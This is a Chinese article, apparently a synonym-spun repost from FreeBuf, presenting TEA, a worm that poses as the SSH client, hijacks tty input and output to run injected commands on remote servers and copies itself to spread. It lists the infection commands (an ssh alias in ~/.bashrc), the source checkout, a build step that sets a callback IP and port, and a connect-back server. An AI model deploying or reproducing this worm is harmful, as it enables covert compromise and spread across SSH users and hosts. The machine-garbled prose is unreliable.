关键词:感染|执行|工具|蠕虫|信息|编译

完成散播和感染tty改动:卸载掉:编译获得源

  • 时间:
  • 浏览:11

文章内容文件目录

完成散播和感染tty改动:卸载掉:编译获得源代码:搭建选择项:示例:网络服务器编译:工具演试新项目详细地址

TEA是一款根据TAS架构的SSH手机客户端蠕虫,从实质上说,它是一个假冒的SSH手机客户端,它可以改动tty键入/輸出来完成随意指令执行,或根据SSH联接来提交本身以完成渗入感染。

以便完成该工具的一切正常作用,远程控制服务器必须考虑下列标准:

1、在登陆时显示信息“Last login”信息;

2、dd和stty;

3、总体目标客户应用Bash做为默认设置Shell;

4、可运作fakessh编码;

5、~/.bashrc可载入;

感染当地服务器:

mkdir ~/.sshworm

cp ssh ~/.sshworm

alias ssh='~/.sshworm/ssh'

人们初次执行fakessh时,并不会显示信息一切內容,工具会执行post-install.c中的编码,并将字符串数组alias ssh=”~/.sshworm/ssh”载入到~/.bashrc中:

$ ssh

$ ssh

usage: ssh [-46AaCfGgKkMNnqsTtVvXxYy] [-B bind_interface]

[-b bind_address] [-c cipher_spec] [-D [bind_address:]port]

[-E log_file] [-e escape_char] [-F configfile] [-I pkcs11]

[-i identity_file] [-J [[email protected]]host[:port]] [-L address]

[-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]

[-Q query_option] [-R address] [-S ctl_path] [-W host:port]

[-w local_tun[:remote_tun]] destination [command]

完成散播和感染

人们只必须联接到总体目标SSH网络服务器,而且网络服务器考虑TEA运作标准得话,总体目标机器设备及其联接至总体目标机器设备的服务器就可以取得成功被感染。

tty改动:

Fakessh执行以后,它可能直到字符串数组“Last login”来打开I/O改动(output-hooks.c),当接受到“Last login”以后,它可能推送一些随意命令(inject-cmd.c),随后等候指令执行的結果(output-hooks.c)。假如远程控制机器设备中不会有文档~/.sshworm/ssh得话,蠕虫将大会上传本身(upload.c)。

卸载掉:

$ rm -rf ~/.sshworm

$ perl -i -pe 's;alias ssh="~/.sshworm/ssh";;g' ~/.bashrc

$ unalias ssh

编译

我建议大伙儿应用musl-libc,或别的的libc,但我不会提议大伙儿应用glibc,由于应用glibc编译的编码会十分大。

获得源代码:

$ git clone –recurse-submodules https://github.com/hc0d3r/tea

搭建选择项:

名字详细介绍IP远程控制IPv4 联接PORT远程控制port 联接

示例:

$ make CC=musl-gcc IP=my-ipv4 PORT=1234

网络服务器

这儿人们制做了一个简易的网络服务器来解决连接,当post-install.c的编码被执行以后,网络服务器可能接受到连接。网络服务器体制比较简单,当新连接创建取得成功以后,它可能执行一条新的指令并根据命令传送连接文件描述符,那样才可以确保执行的程序流程可以解决连接。

编译:

$ cd server

$ make

cc -Wall -Wextra -O3 -c net.c -o net.o

cc -Wall -Wextra -O3 -c replace.c -o replace.o

cc -Wall -Wextra -O3 -c term.c -o term.o

cc -Wall -Wextra -O3 -c main.c -o main.o

cc -Wall -Wextra -O3 -o server net.o replace.o term.o main.o

工具演试

新项目详细地址

TEA:【GitHub传送门】

* 参照来源于:hc0d3r,FB网编Alpha_h4ck编译,转截请标明来源于FreeBuf.COM

猜你喜欢